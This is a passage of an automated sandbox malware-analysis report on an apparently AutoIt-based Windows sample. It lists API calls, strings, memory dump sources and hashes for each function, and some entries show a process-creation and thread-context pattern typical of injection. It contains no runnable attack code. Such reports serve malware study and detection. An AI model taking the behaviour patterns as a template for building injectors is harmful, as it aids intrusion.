                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005130AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 005130CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005130DC
                                                                      • LoadIconW.USER32(000000A9), ref: 005130F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00513101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00513074
                                                                      • RegisterClassExW.USER32(00000030), ref: 0051309E
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005130AF
                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 005130CC
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005130DC
                                                                      • LoadIconW.USER32(000000A9), ref: 005130F2
                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00513101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: 833ebc4c12fe1c753eb0cc0de321418dd2289009869d47aa02ad05e019f1fd84
                                                                      • Instruction ID: b54820ce48101f9ab1d67625d0f9fecee19ce222a41fc929b5dacd5a40ab03fd
                                                                      • Opcode Fuzzy Hash: 833ebc4c12fe1c753eb0cc0de321418dd2289009869d47aa02ad05e019f1fd84
                                                                      • Instruction Fuzzy Hash: C921E5B5901608AFDB10DFA4E849BDDBBF8FB18701F10412BF511E62A0E7B14548AF91

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00514706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005D52F8,?,005137AE,?), ref: 00514724
                                                                        • Part of subcall function 0053050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00517165), ref: 0053052D
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005171A8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0054E8C8
                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0054E909
                                                                      • RegCloseKey.ADVAPI32(?), ref: 0054E947
                                                                      • _wcscat.LIBCMT ref: 0054E9A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                      • API String ID: 2673923337-2727554177
                                                                      • Opcode ID: 357853dc38183d55f7bd1a5f8abb81652e3e38c1067cd9549528c5daee394533
                                                                      • Instruction ID: 75ec5cec0143ccac03d6b05ad39d149b6d11bb50ff6cd28762415e947bd3ea46
                                                                      • Opcode Fuzzy Hash: 357853dc38183d55f7bd1a5f8abb81652e3e38c1067cd9549528c5daee394533
                                                                      • Instruction Fuzzy Hash: 9C716B755093029ED710EF29E8959ABBFF8FF98310F40092FF445872A0EB71994ADB52

                                                                       Control-flow Graph (function 00513633)
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 005136D2
                                                                      • KillTimer.USER32(?,00000001), ref: 005136FC
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0051371F
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051372A
                                                                      • CreatePopupMenu.USER32 ref: 0051373E
                                                                      • PostQuitMessage.USER32(00000000), ref: 0051374D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated$%Z
                                                                      • API String ID: 129472671-3280111068
                                                                      • Opcode ID: f0f77af7fc4000aaf2887ae1beb565f578fb181dcd728b14418df46487a73982
                                                                      • Instruction ID: 2344ea59a657a6b073d80b12bfc4e75c3498b52dcd0ade05fdb79ab4eaba3498
                                                                      • Opcode Fuzzy Hash: f0f77af7fc4000aaf2887ae1beb565f578fb181dcd728b14418df46487a73982
                                                                      • Instruction Fuzzy Hash: 9B41F4B5200506EBFB245F68EC1DBFD3FA4FB65301F140927F502D62E1EA609E89A761

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00513A50
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00513A5F
                                                                      • LoadIconW.USER32(00000063), ref: 00513A76
                                                                      • LoadIconW.USER32(000000A4), ref: 00513A88
                                                                      • LoadIconW.USER32(000000A2), ref: 00513A9A
                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00513AC0
                                                                      • RegisterClassExW.USER32(?), ref: 00513B16
                                                                        • Part of subcall function 00513041: GetSysColorBrush.USER32(0000000F), ref: 00513074
                                                                        • Part of subcall function 00513041: RegisterClassExW.USER32(00000030), ref: 0051309E
                                                                        • Part of subcall function 00513041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005130AF
                                                                        • Part of subcall function 00513041: InitCommonControlsEx.COMCTL32(?), ref: 005130CC
                                                                        • Part of subcall function 00513041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005130DC
                                                                        • Part of subcall function 00513041: LoadIconW.USER32(000000A9), ref: 005130F2
                                                                        • Part of subcall function 00513041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00513101
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: 4cca56e45210a72d1bd293072f5180bbb0d1035d2c7de13914c1a068ee3850b1
                                                                      • Instruction ID: b9ac6de98a80b788a08d7d4e4b82a68d985caf89cc625f578623942bc0509ef1
                                                                      • Opcode Fuzzy Hash: 4cca56e45210a72d1bd293072f5180bbb0d1035d2c7de13914c1a068ee3850b1
                                                                      • Instruction Fuzzy Hash: DD211C75901304AFEB20DFA4EC49B9D7FB5FB18711F10011BE504A62A1E3B55558AF94

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R]
                                                                      • API String ID: 1825951767-2147881669
                                                                      • Opcode ID: 47c9f0864e40bc0ac17d2050b5c274906364b22a805e220580cc4122fa8bc7c9
                                                                      • Instruction ID: a4ffaece4d46c40f66443f2d62d965ee0daf816abe8bb119fe3feeb61ea922a4
                                                                      • Opcode Fuzzy Hash: 47c9f0864e40bc0ac17d2050b5c274906364b22a805e220580cc4122fa8bc7c9
                                                                      • Instruction Fuzzy Hash: B8A15F7590021EAAEF14EBA4DC59AEEBF78BF94300F40052AF415B7191EF745A88CB60

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530193
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0053019B
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005301A6
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005301B1
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(00000011,00000000), ref: 005301B9
                                                                        • Part of subcall function 00530162: MapVirtualKeyW.USER32(00000012,00000000), ref: 005301C1
                                                                        • Part of subcall function 005260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0051F930), ref: 00526154
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051F9CD
                                                                      • OleInitialize.OLE32(00000000), ref: 0051FA4A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 005545C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: <W]$\T]$%Z$S]
                                                                      • API String ID: 1986988660-1068505368
                                                                      • Opcode ID: 8364bd511748c75337e5a81be5b24b5b1fbd13d94e87003026dd60a54b622df6
                                                                      • Instruction ID: 28189a67f08aad9b81c37370435253cc0377e5e6839895c7f56d71c71f775a30
                                                                      • Opcode Fuzzy Hash: 8364bd511748c75337e5a81be5b24b5b1fbd13d94e87003026dd60a54b622df6
                                                                      • Instruction Fuzzy Hash: A281ABB0903A41CFCBA4DF3DA9446587FE5FBA93467A0852BA018CB361F7704488EF56

                                                                      Control-flow Graph

                                                                       (function 01036598)
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01036669
                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0103688F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileFreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 204039940-0
                                                                      • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction ID: af675a36539e0e7c5d5e4c8b4ae8c4fc733f8711077b6f778c9249f4802be154
                                                                      • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                      • Instruction Fuzzy Hash: 54A12C74E00209EBEB14CF94C894BEEBBB9FF88704F208599E541BB281D7769A41CF54

                                                                      Control-flow Graph

                                                                       (function 005139D5)
                                                                      APIs
                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00513A03
                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00513A24
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00513A38
                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00513A41
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CreateShow
                                                                      • String ID: AutoIt v3$edit
                                                                      • API String ID: 1584632944-3779509399
                                                                      • Opcode ID: 4a43297b188e0aa3e3e484245e311fe16296308e2bdb5bbcc77f7c8cb2a4d262
                                                                      • Instruction ID: c46b6e4df22fba5c8bb84f3d441a404c9a6324466a5325822f382bf4010b9ebc
                                                                      • Opcode Fuzzy Hash: 4a43297b188e0aa3e3e484245e311fe16296308e2bdb5bbcc77f7c8cb2a4d262
                                                                      • Instruction Fuzzy Hash: F1F03A746022907EEA3097236C48E6B2F7DE7D6F50B01002BB900E2170D2610808EAB0

                                                                      Control-flow Graph

                                                                       (function 01036378)
                                                                      APIs
                                                                        • Part of subcall function 01036268: Sleep.KERNELBASE(000001F4), ref: 01036279
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0103648E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFileSleep
                                                                      • String ID: YMHYF3NOKWF
                                                                      • API String ID: 2694422964-3138929083
                                                                      • Opcode ID: ed522ae7cb353b07cdcf0c28f31c659a28aa978a19c3c35e918f68bbc55002ca
                                                                      • Instruction ID: 09932522aeaed6907711cc3bf38f54f8981aa384d5eb3ad952020847dc374687
                                                                      • Opcode Fuzzy Hash: ed522ae7cb353b07cdcf0c28f31c659a28aa978a19c3c35e918f68bbc55002ca
                                                                      • Instruction Fuzzy Hash: 7751B230D04249EBEF11DBE4D854BEEBB79AF58700F004199E648BB2C0DB7A5B44CB65

                                                                      Control-flow Graph

                                                                      • [control-flow graph rendered as an image in the original report; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0054D3D7
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • _memset.LIBCMT ref: 005140FC
                                                                      • _wcscpy.LIBCMT ref: 00514150
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00514160
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3942752672-1585850449
                                                                      • Opcode ID: 1aaf6cafa9b112c868642c68d213e23461e08175ebc3b55dadac3f11eec8d787
                                                                      • Instruction ID: 41894f637fbb7b3a6f71daaf06bebd0bd28a8db06b05976ea652300ecc94d463
                                                                      • Opcode Fuzzy Hash: 1aaf6cafa9b112c868642c68d213e23461e08175ebc3b55dadac3f11eec8d787
                                                                      • Instruction Fuzzy Hash: 3C31A171008706AAE730EB64DC49BDB7FE8BF98304F10491BF58592191EB70968DCB92
                                                                      APIs
                                                                        • Part of subcall function 00514DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514E0F
                                                                      • _free.LIBCMT ref: 0054E263
                                                                      • _free.LIBCMT ref: 0054E2AA
                                                                        • Part of subcall function 00516A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00516BAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                      • API String ID: 2861923089-1757145024
                                                                      • Opcode ID: c69b8d7551c03d9e8f83886214e8f7c66ee0a71cbe7c521e83765b79465023d6
                                                                      • Instruction ID: 51e9658158e10cf4447849823e8ae6bca6a91c90284a800fcc69ca97c6cc2adc
                                                                      • Opcode Fuzzy Hash: c69b8d7551c03d9e8f83886214e8f7c66ee0a71cbe7c521e83765b79465023d6
                                                                      • Instruction Fuzzy Hash: 5F917C7190421AAFDF04EFA4D89A9EDBFB8FF48314F144429F815AB2A1DB709945CB50
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005135A1,SwapMouseButtons,00000004,?), ref: 005135D4
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005135A1,SwapMouseButtons,00000004,?,?,?,?,00512754), ref: 005135F5
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,005135A1,SwapMouseButtons,00000004,?,?,?,?,00512754), ref: 00513617
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      • Opcode ID: 94210e51a614107d56a896ac797321b0d29f3d785ec683c7988996d65fe33aa4
                                                                      • Instruction ID: 4f0a91a34aee029eac50afe4a44ed4fe9fabbc8a80386d1433003dc61099b222
                                                                      • Opcode Fuzzy Hash: 94210e51a614107d56a896ac797321b0d29f3d785ec683c7988996d65fe33aa4
                                                                      • Instruction Fuzzy Hash: B9114871610208BFEB208F64DC949EEBBBCFF44740F01446AE805D7210D2719E94A760
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01035A23
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01035AB9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01035ADB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction ID: b43294114c6f13d21ea0551b1e7701ce8b0b09d53d050482f483a88466ea30a2
                                                                      • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                      • Instruction Fuzzy Hash: 89621C30A146189BEB24DFA4CC54BDEB376EF98300F1091A9D14DEB3A0E7759E81CB59
                                                                      APIs
                                                                        • Part of subcall function 00514EE5: _fseek.LIBCMT ref: 00514EFD
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579824
                                                                        • Part of subcall function 00579734: _wcscmp.LIBCMT ref: 00579837
                                                                      • _free.LIBCMT ref: 005796A2
                                                                      • _free.LIBCMT ref: 005796A9
                                                                      • _free.LIBCMT ref: 00579714
                                                                        • Part of subcall function 00532D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00539A24), ref: 00532D69
                                                                        • Part of subcall function 00532D55: GetLastError.KERNEL32(00000000,?,00539A24), ref: 00532D7B
                                                                      • _free.LIBCMT ref: 0057971C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                      • String ID:
                                                                      • API String ID: 1552873950-0
                                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction ID: 3f36529ba73fc67415253c82b025d1f1c402706df833349beb7b44260686e2a7
                                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction Fuzzy Hash: 08514BB1904259ABDF249F64DC85AAEBBB9FF88300F10449EF20DA7341DB715A81CF58
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction ID: 5bb00aff08284f3389ab7886bd1a008d146279213416d59a5585cf36d4d4d72a
                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction Fuzzy Hash: 5F41C475A007469BDB18CEA9C8949AEBFA5FF82360F24857DE815C7640D770FD428F40
                                                                      APIs
